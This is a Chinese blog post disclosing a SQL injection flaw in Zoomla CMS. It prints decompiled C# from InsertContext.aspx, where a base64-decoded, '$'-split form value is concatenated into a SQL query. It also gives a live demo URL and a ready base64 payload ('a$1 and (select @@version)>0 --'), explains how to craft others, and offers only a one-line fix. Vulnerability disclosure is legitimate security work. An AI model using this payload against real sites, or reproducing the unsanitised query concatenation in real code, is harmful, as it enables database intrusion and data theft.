逐浪CMS某处编码SQL注入漏洞

逐浪CMS某处编码SQL注入漏洞

地址

https://demo.zoomla.cn/3d/InsertContext.aspx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
protected void Page_Load(object sender, EventArgs e)
{
    if (base.Request.QueryString["type"] != null)
    {
        this.md.Caddtime = DateTime.Now;
        this.md.Cadduser = this.user.GetLogin().UserName;
        string s = base.Request.Form.ToString();
        s = base.Server.UrlDecode(s);
        try
        {
            s = BaseClass.FromBase64String(s); //base64转换
        }
        catch (Exception exception)
        {
            s = exception.ToString() + s;
        }
        if (s.IndexOf("$") > -1)
        {
            string[] strArray = s.Split(new char[] { '$' },   StringSplitOptions.RemoveEmptyEntries); //分割
            if (base.Request.QueryString["type"].ToString() == "Suser")
            {
                DataTable table = this.bduser.Select_Where(" Dutype=1 and DuShow=" + strArray[1], " * ", ""); //数组第二部分没处理 存在注入
                if (table.Rows.Count > 0)
                {
                    this.md.Ctouid = DataConverter.CLng(table.Rows[0]["DUid"].ToString());
                }
                this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", "");
                if ((this.dt.Rows.Count > 0) && (this.mduser.Dislogin == 0))
                {
                    this.mduser.Dmessage++;
                }
            }
            else
            {
                this.md.Ctouid = DataConverter.CLng(strArray[1]);
                this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", "");
                this.mduser.Dmessage++;
            }
            this.md.Ccontent = BaseClass.Htmlcode(strArray[0]);
            this.md.ChatType = 0;
            this.SetUserContext();
        }
        else
        {
            this.dt = this.bduser.Select_Where(" Duid=" + this.user.GetLogin().UserID, " * ", "");
            this.md.Ccontent = BaseClass.Htmlcode(s);
            this.md.ChatType = 1;
            this.SetUserContext();
        }
        this.bd.GetInsert(this.md);
    }
    if (this.dt != null)
    {
        this.dt.Dispose();
    }
}

访问

 

https://demo.zoomla.cn/3d/InsertContext.aspx?type=Suser

提交

YSQxIGFuZCAoc2VsZWN0IEBAdmVyc2lvbik+MCAtLQ==

这个是base64的值 原来的值是 a$1 and (select @@version)>0 --

$后面可自己构造 然后整个字符串转换为base64编码

修复方案:

对参数进行处理

转载请注明出处:http://www.donr.com.cn/141.html


扫一扫,分享到微信

猜你喜欢

文章评论

电子邮件地址不会被公开。 必填项已用*标注

后发表评论

上一篇

dedecms 5.6的入0day漏洞及解决方案

下一篇

Windows提权漏洞利用Exp(CVE-2018-8120)